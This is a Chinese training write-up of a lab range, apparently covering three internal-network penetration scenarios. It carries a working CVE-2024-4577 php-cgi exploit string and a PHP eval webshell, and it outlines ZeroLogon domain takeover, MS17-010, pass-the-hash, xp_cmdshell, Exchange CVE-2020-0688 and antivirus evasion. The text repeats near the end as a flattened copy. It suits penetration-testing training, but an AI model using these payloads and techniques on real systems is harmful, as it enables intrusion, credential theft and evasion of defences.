小迪安全2024内网靶场-VPC1 & VPC2 & VPC3 渗透测试教学文档

VPC1 渗透测试流程

初始访问

入口机器: 192.168.133.185

漏洞利用: PHP 8.2.12 CVE-2024-4577 RCE漏洞

/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input

写入Webshell:

<?php
file_put_contents('/test.php', '<?php eval($_POST["test"]);');
?>

文件位置确认:
- 上传目录: C:\xampp\php
- Web目录: C:\xampp\htdocs

横向移动

网络探测:
- 发现其他主机: 192.168.2.4
MS17-010(永恒之蓝)利用:
- 使用Metasploit的ms17_010模块
- 成功上线192.168.2.4
权限维持:
- 上传后门: upload \home\kali\Desktop\test2.exe C:\test2.exe
凭证窃取:
- 使用mimikatz抓取明文密码失败
- 进程注入降权至administrator后成功抓取
横向移动:
- 192.168.2.4有防火墙，正向上线192.168.2.6
Weblogic服务发现:
- 扫描到192.168.4.*网段的7001端口
- 上传内存马&CS后门上线192.168.4.128
域控提权:
- 使用CVE-2020-1472清空域控凭证
- 使用sectetsdump.py获取域控hash
- 使用psexec横向移动

VPC2 渗透测试流程

初始访问

入口机器: 192.168.133.189
服务发现:
- 8080端口Tomcat服务
- 弱口令登录后台，部署war包getshell

信息收集

域信息:
- net user /domain & ping dc确认域控IP
数据库发现:
- 扫描常见数据库端口
- 在C:\WebCode\dangan\Web.config找到数据库密码

横向移动

数据库提权:
- 使用mudt连接MSSQL
- 开启xp_cmdshell执行命令
免杀技术:
- 火绒拦截certutil.exe
- 分离免杀后门成功上线
域内探测:
- 发现192.168.3.*网段
- 通达OA工具利用
域控提权:
- CVE-2020-1472获取hash
- hash传递上线192.168.3.20
约束委派攻击:
- 使用Adfind探测约束委派
- 上传后门至192.168.4.20并执行

VPC3 渗透测试流程

初始访问

入口机器: 192.168.133.198
Redis未授权访问:
- 写入公钥getshell

横向移动

后门部署:
- MSF生成后门并启动HTTP服务
- 目标主动下载后门
SSH连接发现:
- 检查~/.bash_history发现SSH连接行为
- 成功连接192.168.52.20
多层代理:
- 配置socks5代理
- 使用stowaway建立多层代理
Exchange攻击:
- 发现Exchange服务
- CVE-2020-0688利用
- 使用ysoserial.exe生成payload
Windows Defender绕过:
- 横向移动手法拦截较少
- PS1后门转换为exe免杀

关键工具与技术总结

漏洞利用:
- PHP CVE-2024-4577
- MS17-010(永恒之蓝)
- CVE-2020-1472(域控提权)
- CVE-2020-0688(Exchange)
横向移动技术:
- 数据库提权(xp_cmdshell)
- 约束委派攻击
- hash传递攻击
- psexec横向移动
免杀技术:
- 分离免杀后门
- PS1转exe免杀
- 绕过火绒/Windows Defender
代理技术:
- socks5代理
- stowaway多层代理
信息收集工具:
- Adfind(域信息收集)
- mimikatz(凭证窃取)
- secretsdump.py(hash提取)

注意事项

靶机环境可能存在防火墙限制，需要采用正向连接
不同杀软(火绒/Windows Defender)需要采用不同绕过技术
域环境渗透需注意约束委派等高级攻击手法
多层代理是复杂内网渗透的关键技术

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3 渗透测试教学文档 VPC1 渗透测试流程初始访问入口机器 : 192.168.133.185 漏洞利用 : PHP 8.2.12 CVE-2024-4577 RCE漏洞写入Webshell : 文件位置确认 : 上传目录: C:\xampp\php Web目录: C:\xampp\htdocs 横向移动网络探测 : 发现其他主机: 192.168.2.4 MS17-010(永恒之蓝)利用 : 使用Metasploit的 ms17_010 模块成功上线192.168.2.4 权限维持 : 上传后门: upload \home\kali\Desktop\test2.exe C:\test2.exe 凭证窃取 : 使用mimikatz抓取明文密码失败进程注入降权至administrator后成功抓取横向移动 : 192.168.2.4有防火墙，正向上线192.168.2.6 Weblogic服务发现 : 扫描到192.168.4.* 网段的7001端口上传内存马&CS后门上线192.168.4.128 域控提权 : 使用CVE-2020-1472清空域控凭证使用sectetsdump.py获取域控hash 使用psexec横向移动 VPC2 渗透测试流程初始访问入口机器 : 192.168.133.189 服务发现 : 8080端口Tomcat服务弱口令登录后台，部署war包getshell 信息收集域信息 : net user /domain & ping dc 确认域控IP 数据库发现 : 扫描常见数据库端口在 C:\WebCode\dangan\Web.config 找到数据库密码横向移动数据库提权 : 使用mudt连接MSSQL 开启xp_ cmdshell执行命令免杀技术 : 火绒拦截certutil.exe 分离免杀后门成功上线域内探测 : 发现192.168.3.* 网段通达OA工具利用域控提权 : CVE-2020-1472获取hash hash传递上线192.168.3.20 约束委派攻击 : 使用Adfind探测约束委派上传后门至192.168.4.20并执行 VPC3 渗透测试流程初始访问入口机器 : 192.168.133.198 Redis未授权访问 : 写入公钥getshell 横向移动后门部署 : MSF生成后门并启动HTTP服务目标主动下载后门 SSH连接发现 : 检查 ~/.bash_history 发现SSH连接行为成功连接192.168.52.20 多层代理 : 配置socks5代理使用stowaway建立多层代理 Exchange攻击 : 发现Exchange服务 CVE-2020-0688利用使用ysoserial.exe生成payload Windows Defender绕过 : 横向移动手法拦截较少 PS1后门转换为exe免杀关键工具与技术总结漏洞利用 : PHP CVE-2024-4577 MS17-010(永恒之蓝) CVE-2020-1472(域控提权) CVE-2020-0688(Exchange) 横向移动技术 : 数据库提权(xp_ cmdshell) 约束委派攻击 hash传递攻击 psexec横向移动免杀技术 : 分离免杀后门 PS1转exe免杀绕过火绒/Windows Defender 代理技术 : socks5代理 stowaway多层代理信息收集工具 : Adfind(域信息收集) mimikatz(凭证窃取) secretsdump.py(hash提取) 注意事项靶机环境可能存在防火墙限制，需要采用正向连接不同杀软(火绒/Windows Defender)需要采用不同绕过技术域环境渗透需注意约束委派等高级攻击手法多层代理是复杂内网渗透的关键技术